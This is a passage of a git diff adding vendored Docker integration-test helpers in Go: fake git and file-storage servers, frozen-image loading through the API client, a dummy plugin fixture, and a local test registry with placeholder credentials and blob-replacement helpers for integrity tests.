root string + server gitServer + RepoURL string +} + +// Close closes the server, implements Closer interface +func (g *FakeGit) Close() { + g.server.Close() + os.RemoveAll(g.root) +} + +// New create a fake git server that can be used for git related tests +func New(c testingT, name string, files map[string]string, enforceLocalServer bool) *FakeGit { + if ht, ok := c.(test.HelperT); ok { + ht.Helper() + } + ctx := fakecontext.New(c, "", fakecontext.WithFiles(files)) + defer ctx.Close() + curdir, err := os.Getwd() + if err != nil { + c.Fatal(err) + } + defer os.Chdir(curdir) + + if output, err := exec.Command("git", "init", ctx.Dir).CombinedOutput(); err != nil { + c.Fatalf("error trying to init repo: %s (%s)", err, output) + } + err = os.Chdir(ctx.Dir) + if err != nil { + c.Fatal(err) + } + if output, err := exec.Command("git", "config", "user.name", "Fake User").CombinedOutput(); err != nil { + c.Fatalf("error trying to set 'user.name': %s (%s)", err, output) + } + if output, err := exec.Command("git", "config", "user.email", "fake.user@example.com").CombinedOutput(); err != nil { + c.Fatalf("error trying to set 'user.email': %s (%s)", err, output) + } + if output, err := exec.Command("git", "add", "*").CombinedOutput(); err != nil { + c.Fatalf("error trying to add files to repo: %s (%s)", err, output) + } + if output, err := exec.Command("git", "commit", "-a", "-m", "Initial commit").CombinedOutput(); err != nil { + c.Fatalf("error trying to commit to repo: %s (%s)", err, output) + } + + root, err := ioutil.TempDir("", "docker-test-git-repo") + if err != nil { + c.Fatal(err) + } + repoPath := filepath.Join(root, name+".git") + if output, err := exec.Command("git", "clone", "--bare", ctx.Dir, repoPath).CombinedOutput(); err != nil { + os.RemoveAll(root) + c.Fatalf("error trying to clone --bare: %s (%s)", err, output) + } + err = os.Chdir(repoPath) + if err != nil { + os.RemoveAll(root) + c.Fatal(err) + } + if output, err := exec.Command("git", "update-server-info").CombinedOutput(); err != nil { + os.RemoveAll(root) + c.Fatalf("error trying to git update-server-info: %s (%s)", err, output) + } + err = os.Chdir(curdir) + if err != nil { + os.RemoveAll(root) + c.Fatal(err) + } + + var server gitServer + if !enforceLocalServer { + // use fakeStorage server, which might be local or remote (at test daemon) + server = fakestorage.New(c, root) + } else { + // always start a local http server on CLI test machine + httpServer := httptest.NewServer(http.FileServer(http.Dir(root))) + server = &localGitServer{httpServer} + } + return &FakeGit{ + root: root, + server: server, + RepoURL: fmt.Sprintf("%s/%s.git", server.URL(), name), + } +} diff --git a/vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go b/vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go new file mode 100644 index 0000000000..ad8f763143 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go @@ -0,0 +1,92 @@ +package fakestorage // import "github.com/docker/docker/internal/test/fakestorage" + +import ( + "context" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "sync" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test" + "github.com/docker/docker/pkg/archive" + "gotest.tools/assert" +) + +var ensureHTTPServerOnce sync.Once + +func ensureHTTPServerImage(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + var doIt bool + ensureHTTPServerOnce.Do(func() { + doIt = true + }) + + if !doIt { + return + } + + defer testEnv.ProtectImage(t, "httpserver:latest") + + tmp, err := ioutil.TempDir("", "docker-http-server-test") + if err != nil { + t.Fatalf("could not build http server: %v", err) + } + defer os.RemoveAll(tmp) + + goos := testEnv.OSType + if goos == "" { + goos = "linux" + } + goarch := os.Getenv("DOCKER_ENGINE_GOARCH") + if goarch == "" { + goarch = "amd64" + } + + cpCmd, lookErr := exec.LookPath("cp") + if lookErr != nil { + t.Fatalf("could not build http server: %v", lookErr) + } + + if _, err = os.Stat("../contrib/httpserver/httpserver"); os.IsNotExist(err) { + goCmd, lookErr := exec.LookPath("go") + if lookErr != nil { + t.Fatalf("could not build http server: %v", lookErr) + } + + cmd := exec.Command(goCmd, "build", "-o", filepath.Join(tmp, "httpserver"), "github.com/docker/docker/contrib/httpserver") + cmd.Env = append(os.Environ(), []string{ + "CGO_ENABLED=0", + "GOOS=" + goos, + "GOARCH=" + goarch, + }...) + var out []byte + if out, err = cmd.CombinedOutput(); err != nil { + t.Fatalf("could not build http server: %s", string(out)) + } + } else { + if out, err := exec.Command(cpCmd, "../contrib/httpserver/httpserver", filepath.Join(tmp, "httpserver")).CombinedOutput(); err != nil { + t.Fatalf("could not copy http server: %v", string(out)) + } + } + + if out, err := exec.Command(cpCmd, "../contrib/httpserver/Dockerfile", filepath.Join(tmp, "Dockerfile")).CombinedOutput(); err != nil { + t.Fatalf("could not build http server: %v", string(out)) + } + + c := testEnv.APIClient() + reader, err := archive.TarWithOptions(tmp, &archive.TarOptions{}) + assert.NilError(t, err) + resp, err := c.ImageBuild(context.Background(), reader, types.ImageBuildOptions{ + Remove: true, + ForceRemove: true, + Tags: []string{"httpserver"}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/internal/test/fakestorage/storage.go b/vendor/github.com/docker/docker/internal/test/fakestorage/storage.go new file mode 100644 index 0000000000..b091cbc3f1 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fakestorage/storage.go @@ -0,0 +1,200 @@ +package fakestorage // import "github.com/docker/docker/internal/test/fakestorage" + +import ( + "context" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "net/url" + "os" + "strings" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/internal/testutil" + "github.com/docker/go-connections/nat" + "gotest.tools/assert" +) + +var testEnv *environment.Execution + +type testingT interface { + assert.TestingT + logT + skipT + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +type skipT interface { + Skip(reason string) +} + +// Fake is a static file server. It might be running locally or remotely +// on test host. +type Fake interface { + Close() error + URL() string + CtxDir() string +} + +// SetTestEnvironment sets a static test environment +// TODO: decouple this package from environment +func SetTestEnvironment(env *environment.Execution) { + testEnv = env +} + +// New returns a static file server that will be use as build context. +func New(t testingT, dir string, modifiers ...func(*fakecontext.Fake) error) Fake { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if testEnv == nil { + t.Fatal("fakstorage package requires SetTestEnvironment() to be called before use.") + } + ctx := fakecontext.New(t, dir, modifiers...) + switch { + case testEnv.IsRemoteDaemon() && strings.HasPrefix(request.DaemonHost(), "unix:///"): + t.Skip(fmt.Sprintf("e2e run : daemon is remote but docker host points to a unix socket")) + case testEnv.IsLocalDaemon(): + return newLocalFakeStorage(ctx) + default: + return newRemoteFileServer(t, ctx, testEnv.APIClient()) + } + return nil +} + +// localFileStorage is a file storage on the running machine +type localFileStorage struct { + *fakecontext.Fake + *httptest.Server +} + +func (s *localFileStorage) URL() string { + return s.Server.URL +} + +func (s *localFileStorage) CtxDir() string { + return s.Fake.Dir +} + +func (s *localFileStorage) Close() error { + defer s.Server.Close() + return s.Fake.Close() +} + +func newLocalFakeStorage(ctx *fakecontext.Fake) *localFileStorage { + handler := http.FileServer(http.Dir(ctx.Dir)) + server := httptest.NewServer(handler) + return &localFileStorage{ + Fake: ctx, + Server: server, + } +} + +// remoteFileServer is a containerized static file server started on the remote +// testing machine to be used in URL-accepting docker build functionality. +type remoteFileServer struct { + host string // hostname/port web server is listening to on docker host e.g. 0.0.0.0:43712 + container string + image string + client client.APIClient + ctx *fakecontext.Fake +} + +func (f *remoteFileServer) URL() string { + u := url.URL{ + Scheme: "http", + Host: f.host} + return u.String() +} + +func (f *remoteFileServer) CtxDir() string { + return f.ctx.Dir +} + +func (f *remoteFileServer) Close() error { + defer func() { + if f.ctx != nil { + f.ctx.Close() + } + if f.image != "" { + if _, err := f.client.ImageRemove(context.Background(), f.image, types.ImageRemoveOptions{ + Force: true, + }); err != nil { + fmt.Fprintf(os.Stderr, "Error closing remote file server : %v\n", err) + } + } + if err := f.client.Close(); err != nil { + fmt.Fprintf(os.Stderr, "Error closing remote file server : %v\n", err) + } + }() + if f.container == "" { + return nil + } + return f.client.ContainerRemove(context.Background(), f.container, types.ContainerRemoveOptions{ + Force: true, + RemoveVolumes: true, + }) +} + +func newRemoteFileServer(t testingT, ctx *fakecontext.Fake, c client.APIClient) *remoteFileServer { + var ( + image = fmt.Sprintf("fileserver-img-%s", strings.ToLower(testutil.GenerateRandomAlphaOnlyString(10))) + container = fmt.Sprintf("fileserver-cnt-%s", strings.ToLower(testutil.GenerateRandomAlphaOnlyString(10))) + ) + + ensureHTTPServerImage(t) + + // Build the image + if err := ctx.Add("Dockerfile", `FROM httpserver +COPY . /static`); err != nil { + t.Fatal(err) + } + resp, err := c.ImageBuild(context.Background(), ctx.AsTarReader(t), types.ImageBuildOptions{ + NoCache: true, + Tags: []string{image}, + }) + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, resp.Body) + assert.NilError(t, err) + + // Start the container + b, err := c.ContainerCreate(context.Background(), &containertypes.Config{ + Image: image, + }, &containertypes.HostConfig{}, nil, container) + assert.NilError(t, err) + err = c.ContainerStart(context.Background(), b.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + // Find out the system assigned port + i, err := c.ContainerInspect(context.Background(), b.ID) + assert.NilError(t, err) + newP, err := nat.NewPort("tcp", "80") + assert.NilError(t, err) + ports, exists := i.NetworkSettings.Ports[newP] + if !exists || len(ports) != 1 { + t.Fatalf("unable to find port 80/tcp for %s", container) + } + host := ports[0].HostIP + port := ports[0].HostPort + + return &remoteFileServer{ + container: container, + image: image, + host: fmt.Sprintf("%s:%s", host, port), + ctx: ctx, + client: c, + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go b/vendor/github.com/docker/docker/internal/test/fixtures/load/frozen.go similarity index 60% rename from vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go rename to vendor/github.com/docker/docker/internal/test/fixtures/load/frozen.go index 13cd393f36..94f3680f95 100644 --- a/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go +++ b/vendor/github.com/docker/docker/internal/test/fixtures/load/frozen.go @@ -1,29 +1,33 @@ -package load +package load // import "github.com/docker/docker/internal/test/fixtures/load" import ( "bufio" "bytes" + "context" "os" "os/exec" "path/filepath" "strings" "sync" + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/term" "github.com/pkg/errors" ) -var frozenImgDir = "/docker-frozen-images" +const frozenImgDir = "/docker-frozen-images" // FrozenImagesLinux loads the frozen image set for the integration suite // If the images are not available locally it will download them // TODO: This loads whatever is in the frozen image dir, regardless of what // images were passed in. If the images need to be downloaded, then it will respect // the passed in images -func FrozenImagesLinux(dockerBinary string, images ...string) error { - imgNS := os.Getenv("TEST_IMAGE_NAMESPACE") +func FrozenImagesLinux(client client.APIClient, images ...string) error { var loadImages []struct{ srcName, destName string } for _, img := range images { - if err := exec.Command(dockerBinary, "inspect", "--type=image", img).Run(); err != nil { + if !imageExists(client, img) { srcName := img // hello-world:latest gets re-tagged as hello-world:frozen // there are some tests that use hello-world:latest specifically so it pulls @@ -32,9 +36,6 @@ func FrozenImagesLinux(dockerBinary string, images ...string) error { if img == "hello-world:frozen" { srcName = "hello-world:latest" } - if imgNS != "" { - srcName = imgNS + "/" + srcName - } loadImages = append(loadImages, struct{ srcName, destName string }{ srcName: srcName, destName: img, @@ -46,35 +47,41 @@ func FrozenImagesLinux(dockerBinary string, images ...string) error { return nil } + ctx := context.Background() fi, err := os.Stat(frozenImgDir) if err != nil || !fi.IsDir() { srcImages := make([]string, 0, len(loadImages)) for _, img := range loadImages { srcImages = append(srcImages, img.srcName) } - if err := pullImages(dockerBinary, srcImages); err != nil { + if err := pullImages(ctx, client, srcImages); err != nil { return errors.Wrap(err, "error pulling image list") } } else { - if err := loadFrozenImages(dockerBinary); err != nil { + if err := loadFrozenImages(ctx, client); err != nil { return err } } for _, img := range loadImages { if img.srcName != img.destName { - if out, err := exec.Command(dockerBinary, "tag", img.srcName, img.destName).CombinedOutput(); err != nil { - return errors.Errorf("%v: %s", err, string(out)) + if err := client.ImageTag(ctx, img.srcName, img.destName); err != nil { + return errors.Wrapf(err, "failed to tag %s as %s", img.srcName, img.destName) } - if out, err := exec.Command(dockerBinary, "rmi", img.srcName).CombinedOutput(); err != nil { - return errors.Errorf("%v: %s", err, string(out)) + if _, err := client.ImageRemove(ctx, img.srcName, types.ImageRemoveOptions{}); err != nil { + return errors.Wrapf(err, "failed to remove %s", img.srcName) } } } return nil } -func loadFrozenImages(dockerBinary string) error { +func imageExists(client client.APIClient, name string) bool { + _, _, err := client.ImageInspectWithRaw(context.Background(), name) + return err == nil +} + +func loadFrozenImages(ctx context.Context, client client.APIClient) error { tar, err := exec.LookPath("tar") if err != nil { return errors.Wrap(err, "could not find tar binary") @@ -90,15 +97,16 @@ func loadFrozenImages(dockerBinary string) error { tarCmd.Start() defer tarCmd.Wait() - cmd := exec.Command(dockerBinary, "load") - cmd.Stdin = out - if out, err := cmd.CombinedOutput(); err != nil { - return errors.Errorf("%v: %s", err, string(out)) + resp, err := client.ImageLoad(ctx, out, true) + if err != nil { + return errors.Wrap(err, "failed to load frozen images") } - return nil + defer resp.Body.Close() + fd, isTerminal := term.GetFdInfo(os.Stdout) + return jsonmessage.DisplayJSONMessagesStream(resp.Body, os.Stdout, fd, isTerminal, nil) } -func pullImages(dockerBinary string, images []string) error { +func pullImages(ctx context.Context, client client.APIClient, images []string) error { cwd, err := os.Getwd() if err != nil { return errors.Wrap(err, "error getting path to dockerfile") @@ -119,16 +127,8 @@ func pullImages(dockerBinary string, images []string) error { wg.Add(1) go func(tag, ref string) { defer wg.Done() - if out, err := exec.Command(dockerBinary, "pull", ref).CombinedOutput(); err != nil { - chErr <- errors.Errorf("%v: %s", string(out), err) - return - } - if out, err := exec.Command(dockerBinary, "tag", ref, tag).CombinedOutput(); err != nil { - chErr <- errors.Errorf("%v: %s", string(out), err) - return - } - if out, err := exec.Command(dockerBinary, "rmi", ref).CombinedOutput(); err != nil { - chErr <- errors.Errorf("%v: %s", string(out), err) + if err := pullTagAndRemove(ctx, client, ref, tag); err != nil { + chErr <- err return } }(tag, ref) @@ -138,6 +138,25 @@ func pullImages(dockerBinary string, images []string) error { return <-chErr } +func pullTagAndRemove(ctx context.Context, client client.APIClient, ref string, tag string) error { + resp, err := client.ImagePull(ctx, ref, types.ImagePullOptions{}) + if err != nil { + return errors.Wrapf(err, "failed to pull %s", ref) + } + defer resp.Close() + fd, isTerminal := term.GetFdInfo(os.Stdout) + if err := jsonmessage.DisplayJSONMessagesStream(resp, os.Stdout, fd, isTerminal, nil); err != nil { + return err + } + + if err := client.ImageTag(ctx, ref, tag); err != nil { + return errors.Wrapf(err, "failed to tag %s as %s", ref, tag) + } + _, err = client.ImageRemove(ctx, ref, types.ImageRemoveOptions{}) + return errors.Wrapf(err, "failed to remove %s", ref) + +} + func readFrozenImageList(dockerfilePath string, images []string) (map[string]string, error) { f, err := os.Open(dockerfilePath) if err != nil { @@ -156,11 +175,6 @@ func readFrozenImageList(dockerfilePath string, images []string) (map[string]str continue } - frozenImgDir = line[2] - if line[2] == frozenImgDir { - frozenImgDir = filepath.Join(os.Getenv("DEST"), "frozen-images") - } - for scanner.Scan() { img := strings.TrimSpace(scanner.Text()) img = strings.TrimSuffix(img, "\\") diff --git a/vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go new file mode 100644 index 0000000000..892272826f --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go @@ -0,0 +1,34 @@ +package main + +import ( + "fmt" + "net" + "net/http" + "os" + "path/filepath" +) + +func main() { + p, err := filepath.Abs(filepath.Join("run", "docker", "plugins")) + if err != nil { + panic(err) + } + if err := os.MkdirAll(p, 0755); err != nil { + panic(err) + } + l, err := net.Listen("unix", filepath.Join(p, "basic.sock")) + if err != nil { + panic(err) + } + + mux := http.NewServeMux() + server := http.Server{ + Addr: l.Addr().String(), + Handler: http.NewServeMux(), + } + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1.1+json") + fmt.Println(w, `{"Implements": ["dummy"]}`) + }) + server.Serve(l) +} diff --git a/vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go new file mode 100644 index 0000000000..523a261ad2 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go @@ -0,0 +1,216 @@ +package plugin // import "github.com/docker/docker/internal/test/fixtures/plugin" + +import ( + "context" + "encoding/json" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/plugin" + "github.com/docker/docker/registry" + "github.com/pkg/errors" +) + +// CreateOpt is is passed used to change the default plugin config before +// creating it +type CreateOpt func(*Config) + +// Config wraps types.PluginConfig to provide some extra state for options +// extra customizations on the plugin details, such as using a custom binary to +// create the plugin with. +type Config struct { + *types.PluginConfig + binPath string +} + +// WithBinary is a CreateOpt to set an custom binary to create the plugin with. +// This binary must be statically compiled. +func WithBinary(bin string) CreateOpt { + return func(cfg *Config) { + cfg.binPath = bin + } +} + +// CreateClient is the interface used for `BuildPlugin` to interact with the +// daemon. +type CreateClient interface { + PluginCreate(context.Context, io.Reader, types.PluginCreateOptions) error +} + +// Create creates a new plugin with the specified name +func Create(ctx context.Context, c CreateClient, name string, opts ...CreateOpt) error { + tmpDir, err := ioutil.TempDir("", "create-test-plugin") + if err != nil { + return err + } + defer os.RemoveAll(tmpDir) + + tar, err := makePluginBundle(tmpDir, opts...) + if err != nil { + return err + } + defer tar.Close() + + ctx, cancel := context.WithTimeout(ctx, 30*time.Second) + defer cancel() + + return c.PluginCreate(ctx, tar, types.PluginCreateOptions{RepoName: name}) +} + +// CreateInRegistry makes a plugin (locally) and pushes it to a registry. +// This does not use a dockerd instance to create or push the plugin. +// If you just want to create a plugin in some daemon, use `Create`. +// +// This can be useful when testing plugins on swarm where you don't really want +// the plugin to exist on any of the daemons (immediately) and there needs to be +// some way to distribute the plugin. +func CreateInRegistry(ctx context.Context, repo string, auth *types.AuthConfig, opts ...CreateOpt) error { + tmpDir, err := ioutil.TempDir("", "create-test-plugin-local") + if err != nil { + return err + } + defer os.RemoveAll(tmpDir) + + inPath := filepath.Join(tmpDir, "plugin") + if err := os.MkdirAll(inPath, 0755); err != nil { + return errors.Wrap(err, "error creating plugin root") + } + + tar, err := makePluginBundle(inPath, opts...) + if err != nil { + return err + } + defer tar.Close() + + dummyExec := func(m *plugin.Manager) (plugin.Executor, error) { + return nil, nil + } + + regService, err := registry.NewService(registry.ServiceOptions{V2Only: true}) + if err != nil { + return err + } + + managerConfig := plugin.ManagerConfig{ + Store: plugin.NewStore(), + RegistryService: regService, + Root: filepath.Join(tmpDir, "root"), + ExecRoot: "/run/docker", // manager init fails if not set + CreateExecutor: dummyExec, + LogPluginEvent: func(id, name, action string) {}, // panics when not set + } + manager, err := plugin.NewManager(managerConfig) + if err != nil { + return errors.Wrap(err, "error creating plugin manager") + } + + ctx, cancel := context.WithTimeout(ctx, 30*time.Second) + defer cancel() + if err := manager.CreateFromContext(ctx, tar, &types.PluginCreateOptions{RepoName: repo}); err != nil { + return err + } + + if auth == nil { + auth = &types.AuthConfig{} + } + err = manager.Push(ctx, repo, nil, auth, ioutil.Discard) + return errors.Wrap(err, "error pushing plugin") +} + +func makePluginBundle(inPath string, opts ...CreateOpt) (io.ReadCloser, error) { + p := &types.PluginConfig{ + Interface: types.PluginConfigInterface{ + Socket: "basic.sock", + Types: []types.PluginInterfaceType{{Capability: "docker.dummy/1.0"}}, + }, + Entrypoint: []string{"/basic"}, + } + cfg := &Config{ + PluginConfig: p, + } + for _, o := range opts { + o(cfg) + } + if cfg.binPath == "" { + binPath, err := ensureBasicPluginBin() + if err != nil { + return nil, err + } + cfg.binPath = binPath + } + + configJSON, err := json.Marshal(p) + if err != nil { + return nil, err + } + if err := ioutil.WriteFile(filepath.Join(inPath, "config.json"), configJSON, 0644); err != nil { + return nil, err + } + if err := os.MkdirAll(filepath.Join(inPath, "rootfs", filepath.Dir(p.Entrypoint[0])), 0755); err != nil { + return nil, errors.Wrap(err, "error creating plugin rootfs dir") + } + + // Ensure the mount target paths exist + for _, m := range p.Mounts { + var stat os.FileInfo + if m.Source != nil { + stat, err = os.Stat(*m.Source) + if err != nil && !os.IsNotExist(err) { + return nil, err + } + } + + if stat == nil || stat.IsDir() { + var mode os.FileMode = 0755 + if stat != nil { + mode = stat.Mode() + } + if err := os.MkdirAll(filepath.Join(inPath, "rootfs", m.Destination), mode); err != nil { + return nil, errors.Wrap(err, "error preparing plugin mount destination path") + } + } else { + if err := os.MkdirAll(filepath.Join(inPath, "rootfs", filepath.Dir(m.Destination)), 0755); err != nil { + return nil, errors.Wrap(err, "error preparing plugin mount destination dir") + } + f, err := os.Create(filepath.Join(inPath, "rootfs", m.Destination)) + if err != nil && !os.IsExist(err) { + return nil, errors.Wrap(err, "error preparing plugin mount destination file") + } + if f != nil { + f.Close() + } + } + } + if err := archive.NewDefaultArchiver().CopyFileWithTar(cfg.binPath, filepath.Join(inPath, "rootfs", p.Entrypoint[0])); err != nil { + return nil, errors.Wrap(err, "error copying plugin binary to rootfs path") + } + tar, err := archive.Tar(inPath, archive.Uncompressed) + return tar, errors.Wrap(err, "error making plugin archive") +} + +func ensureBasicPluginBin() (string, error) { + name := "docker-basic-plugin" + p, err := exec.LookPath(name) + if err == nil { + return p, nil + } + + goBin, err := exec.LookPath("go") + if err != nil { + return "", err + } + installPath := filepath.Join(os.Getenv("GOPATH"), "bin", name) + sourcePath := filepath.Join("github.com", "docker", "docker", "internal", "test", "fixtures", "plugin", "basic") + cmd := exec.Command(goBin, "build", "-o", installPath, sourcePath) + cmd.Env = append(cmd.Env, "GOPATH="+os.Getenv("GOPATH"), "CGO_ENABLED=0") + if out, err := cmd.CombinedOutput(); err != nil { + return "", errors.Wrapf(err, "error building basic plugin bin: %s", string(out)) + } + return installPath, nil +} diff --git a/vendor/github.com/docker/docker/internal/test/helper.go b/vendor/github.com/docker/docker/internal/test/helper.go new file mode 100644 index 0000000000..1b9fd75090 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/helper.go @@ -0,0 +1,6 @@ +package test + +// HelperT is a subset of testing.T that implements the Helper function +type HelperT interface { + Helper() +} diff --git a/vendor/github.com/docker/docker/internal/test/registry/ops.go b/vendor/github.com/docker/docker/internal/test/registry/ops.go new file mode 100644 index 0000000000..c004f37424 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/registry/ops.go @@ -0,0 +1,26 @@ +package registry + +// Schema1 sets the registry to serve v1 api +func Schema1(c *Config) { + c.schema1 = true +} + +// Htpasswd sets the auth method with htpasswd +func Htpasswd(c *Config) { + c.auth = "htpasswd" +} + +// Token sets the auth method to token, with the specified token url +func Token(tokenURL string) func(*Config) { + return func(c *Config) { + c.auth = "token" + c.tokenURL = tokenURL + } +} + +// URL sets the registry url +func URL(registryURL string) func(*Config) { + return func(c *Config) { + c.registryURL = registryURL + } +} diff --git a/vendor/github.com/docker/docker/internal/test/registry/registry.go b/vendor/github.com/docker/docker/internal/test/registry/registry.go new file mode 100644 index 0000000000..b6128d3ba4 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/registry/registry.go @@ -0,0 +1,255 @@ +package registry // import "github.com/docker/docker/internal/test/registry" + +import ( + "fmt" + "io/ioutil" + "net/http" + "os" + "os/exec" + "path/filepath" + "time" + + "github.com/docker/docker/internal/test" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" +) + +const ( + // V2binary is the name of the registry v2 binary + V2binary = "registry-v2" + // V2binarySchema1 is the name of the registry that serve schema1 + V2binarySchema1 = "registry-v2-schema1" + // DefaultURL is the default url that will be used by the registry (if not specified otherwise) + DefaultURL = "127.0.0.1:5000" +) + +type testingT interface { + assert.TestingT + logT + Fatal(...interface{}) + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +// V2 represent a registry version 2 +type V2 struct { + cmd *exec.Cmd + registryURL string + dir string + auth string + username string + password string + email string +} + +// Config contains the test registry configuration +type Config struct { + schema1 bool + auth string + tokenURL string + registryURL string +} + +// NewV2 creates a v2 registry server +func NewV2(t testingT, ops ...func(*Config)) *V2 { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + c := &Config{ + registryURL: DefaultURL, + } + for _, op := range ops { + op(c) + } + tmp, err := ioutil.TempDir("", "registry-test-") + assert.NilError(t, err) + template := `version: 0.1 +loglevel: debug +storage: + filesystem: + rootdirectory: %s +http: + addr: %s +%s` + var ( + authTemplate string + username string + password string + email string + ) + switch c.auth { + case "htpasswd": + htpasswdPath := filepath.Join(tmp, "htpasswd") + // generated with: htpasswd -Bbn testuser testpassword + userpasswd := "testuser:$2y$05$sBsSqk0OpSD1uTZkHXc4FeJ0Z70wLQdAX/82UiHuQOKbNbBrzs63m" + username = "testuser" + password = "testpassword" + email = "test@test.org" + err := ioutil.WriteFile(htpasswdPath, []byte(userpasswd), os.FileMode(0644)) + assert.NilError(t, err) + authTemplate = fmt.Sprintf(`auth: + htpasswd: + realm: basic-realm + path: %s +`, htpasswdPath) + case "token": + authTemplate = fmt.Sprintf(`auth: + token: + realm: %s + service: "registry" + issuer: "auth-registry" + rootcertbundle: "fixtures/registry/cert.pem" +`, c.tokenURL) + } + + confPath := filepath.Join(tmp, "config.yaml") + config, err := os.Create(confPath) + assert.NilError(t, err) + defer config.Close() + + if _, err := fmt.Fprintf(config, template, tmp, c.registryURL, authTemplate); err != nil { + // FIXME(vdemeester) use a defer/clean func + os.RemoveAll(tmp) + t.Fatal(err) + } + + binary := V2binary + if c.schema1 { + binary = V2binarySchema1 + } + cmd := exec.Command(binary, confPath) + if err := cmd.Start(); err != nil { + // FIXME(vdemeester) use a defer/clean func + os.RemoveAll(tmp) + t.Fatal(err) + } + return &V2{ + cmd: cmd, + dir: tmp, + auth: c.auth, + username: username, + password: password, + email: email, + registryURL: c.registryURL, + } +} + +// WaitReady waits for the registry to be ready to serve requests (or fail after a while) +func (r *V2) WaitReady(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + var err error + for i := 0; i != 50; i++ { + if err = r.Ping(); err == nil { + return + } + time.Sleep(100 * time.Millisecond) + } + t.Fatalf("timeout waiting for test registry to become available: %v", err) +} + +// Ping sends an http request to the current registry, and fail if it doesn't respond correctly +func (r *V2) Ping() error { + // We always ping through HTTP for our test registry. + resp, err := http.Get(fmt.Sprintf("http://%s/v2/", r.registryURL)) + if err != nil { + return err + } + resp.Body.Close() + + fail := resp.StatusCode != http.StatusOK + if r.auth != "" { + // unauthorized is a _good_ status when pinging v2/ and it needs auth + fail = fail && resp.StatusCode != http.StatusUnauthorized + } + if fail { + return fmt.Errorf("registry ping replied with an unexpected status code %d", resp.StatusCode) + } + return nil +} + +// Close kills the registry server +func (r *V2) Close() { + r.cmd.Process.Kill() + r.cmd.Process.Wait() + os.RemoveAll(r.dir) +} + +func (r *V2) getBlobFilename(blobDigest digest.Digest) string { + // Split the digest into its algorithm and hex components. + dgstAlg, dgstHex := blobDigest.Algorithm(), blobDigest.Hex() + + // The path to the target blob data looks something like: + // baseDir + "docker/registry/v2/blobs/sha256/a3/a3ed...46d4/data" + return fmt.Sprintf("%s/docker/registry/v2/blobs/%s/%s/%s/data", r.dir, dgstAlg, dgstHex[:2], dgstHex) +} + +// ReadBlobContents read the file corresponding to the specified digest +func (r *V2) ReadBlobContents(t assert.TestingT, blobDigest digest.Digest) []byte { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // Load the target manifest blob. + manifestBlob, err := ioutil.ReadFile(r.getBlobFilename(blobDigest)) + assert.NilError(t, err, "unable to read blob") + return manifestBlob +} + +// WriteBlobContents write the file corresponding to the specified digest with the given content +func (r *V2) WriteBlobContents(t assert.TestingT, blobDigest digest.Digest, data []byte) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + err := ioutil.WriteFile(r.getBlobFilename(blobDigest), data, os.FileMode(0644)) + assert.NilError(t, err, "unable to write malicious data blob") +} + +// TempMoveBlobData moves the existing data file aside, so that we can replace it with a +// malicious blob of data for example. +func (r *V2) TempMoveBlobData(t testingT, blobDigest digest.Digest) (undo func()) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + tempFile, err := ioutil.TempFile("", "registry-temp-blob-") + assert.NilError(t, err, "unable to get temporary blob file") + tempFile.Close() + + blobFilename := r.getBlobFilename(blobDigest) + + // Move the existing data file aside, so that we can replace it with a + // another blob of data. + if err := os.Rename(blobFilename, tempFile.Name()); err != nil { + // FIXME(vdemeester) use a defer/clean func + os.Remove(tempFile.Name()) + t.Fatalf("unable to move data blob: %s", err) + } + + return func() { + os.Rename(tempFile.Name(), blobFilename) + os.Remove(tempFile.Name()) + } +} + +// Username returns the configured user name of the server +func (r *V2) Username() string { + return r.username +} + +// Password returns the configured password of the server +func (r *V2) Password() string { + return r.password +} + +// Email returns the configured email of the server +func (r *V2) Email() string { + return r.email +} + +// Path returns the path where the registry write data +func (r *V2) Path() string { + return filepath.Join(r.dir, "docker", "registry", "v2") +} diff --git 